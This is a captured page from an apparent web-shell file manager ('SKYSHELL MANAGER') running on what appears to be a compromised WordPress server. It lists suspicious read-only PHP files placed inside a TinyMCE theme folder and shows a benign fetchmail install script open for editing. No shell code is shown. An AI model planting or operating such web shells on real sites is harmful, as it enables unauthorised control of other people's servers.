📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: fetchmail.preinst
#!/bin/sh # # Preinst script for fetchmail # $Id: fetchmail.preinst 486 2008-12-22 15:13:12Z nion $ # set -e # Remove a possibly fucked ip-up.d, which was unfortunately not # removed due of being a conffile. This is ugly but the only "clean" # way I see right now. if [ -f /etc/network/if-up.d/fetchmail ] && [ "$2" = "6.2.4-3" ]; then rm -f /etc/network/if-up.d/fetchmail fi # Automatically added by dh_installinit/13.14.1ubuntu5 if [ "$1" = "install" ] && [ -n "$2" ] && [ -e "/etc/init.d/fetchmail" ] ; then chmod +x "/etc/init.d/fetchmail" >/dev/null || true fi # End automatically added section exit 0
Save